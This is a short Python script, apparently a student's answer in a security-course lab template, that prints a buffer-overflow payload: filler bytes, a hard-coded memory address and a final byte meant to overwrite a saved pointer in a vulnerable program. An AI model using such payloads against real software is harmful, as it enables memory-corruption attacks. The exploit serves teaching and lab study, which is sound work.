#!/usr/bin/env python3

import sys

# Configure Python to print text strings like byte strings. Don't remove this!
sys.stdout.reconfigure(encoding='latin1')

### YOUR CODE HERE ###
print('A' * 24 + '\xbc\xff\xdf\xdf' + 'A' * 36 + '\x24')
